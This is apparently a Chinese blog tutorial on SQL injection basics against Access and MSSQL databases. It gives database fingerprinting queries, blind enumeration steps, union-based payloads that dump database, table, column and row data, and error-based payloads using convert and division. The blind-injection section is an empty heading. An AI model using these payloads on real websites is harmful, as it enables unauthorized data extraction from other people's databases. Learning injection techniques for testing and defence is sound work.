SQL注入基础-5

一、Access注入

1、asp网站常用数据库:access,mssql

2、access数据库

(1)没有库,没有端口

(2)结构:表--》字段--》数据

3、注入流程:

  • 判断类型
  • 判断表名:遍历、爆破
  • 判断列名
  • 判断列名下的数据长度
  • 查出数据

4、判断是什么数据库

and exists (select * from msysobjects)>0 access
and exists (select * from sysobjects)>0 mssql

5、破解

(1)判断类型:确定是字符型还是数字型

(2)获取表名:and+exists+(select+*+from+表名)

(3)获取列名:and+exists+(select+列名+from+表名)

(4)获取数据长度:and+(select+top+1+len(列名)+from+表名)>5

(5)获取数据:and+(select+top+1+asc(substr(列名,1,2))+from+表名)>110

6、联合注入:需要知道具体表名

参考资料:https://www.cnblogs.com/drkang/p/8627794.html

二、mssql注入

注:严格区分数字型和字符型

1、特殊数据库:master

2、表:

  • sysdatabases:master库中,保存所有库名
  • syobjects:每个数据库都有,保存数据库中的所有表
  • syscolumns:每个数据库都有,保存所有表的字段名

3、思路

  • 判断类型
  • 获取数据库
  • 获取表
  • 获取字段数
  • 获取数据

4、常用(与MySQL不同)

  • db_name():获取当前数据库名
  • host_name():获取计算机名
  • user:获取用户名
  • current_user:获取当前数据库的用户名
  • substring:字符串截取函数
  • @@version:查看数据库版本
  • char:ASCII转字符函数

5、联合查询注入

(1)获取数据库:-1' union select '1','2',db_name()--+

(2)获取表名:-1' union select '1','2',(select quotename(name) from test.dbo.sysobjects where xtype='u' for xml path(''))--+

  • quotename():与MySQL中的group_concat类似,分隔符不同,quotename()使用中括号
  • test:数据库,dbo:用户
  • xtype:指定用户类型

(3)获取字段数:-1' union select '1','2',(select quotename(name) from test.dbo.syscolumns where id=(select quotename(name) from test.dbo.sysobjects where name='表名') for xml path(''))--+

(4)获取数据:-1' union select '1','2',(select top 1 quotename(name) from test.dbo.表名 where for xml path(''))--+

6、报错注入

(1)convert函数(强制类型转换):' and convert(int,db_name())=1--+

(2)四则运算报错:' and 1/db_name()=1--+

7、盲注

相关推荐
@insist12321 分钟前
系统规划与管理师-信息安全规划概述与安全架构
安全·软考·安全架构·系统规划与管理师·软件水平考试·系统规划与管理工程师
RestCloud8 小时前
借助ETL工具,实现AI智能体+数据的落地
数据仓库·人工智能·sql·etl·etlcloud·数据集成平台·java脚本
上海云盾-小余10 小时前
网站频繁遭遇 SQL 注入溯源与原生漏洞修复全流程总结
数据库·sql
xixixi7777710 小时前
产业全景解读:太空算力、国产芯、国产大模型、6G 空天地、AI 可信身份、后量子安全多线全面突破
人工智能·安全·ai·大模型·数据中心·通信·运营商
m0_4665252911 小时前
新品发布 | 绿盟安全智算一体机,构建“算力、调度、安全“深度融合的AI基础设施
人工智能·安全
hz5678911 小时前
内网视频会议系统建设方案:适合政企单位的安全会议选择
安全·云计算·音视频·实时音视频·信息与通信
2603_9547083112 小时前
全维度容错设计,打造微电网安全运行屏障
服务器·网络·数据库·人工智能·分布式·安全
冰茶丿13 小时前
嵌入式安全第一关:Secure Boot是怎么保护你的设备的?
嵌入式硬件·安全
_Jimmy_14 小时前
SQLAlchemy 复杂 SQL 执行指南与模板库
python·sql
长风23014 小时前
Day14: 极限异常演练 —— 验证系统韧性与错误告警生成
人工智能·安全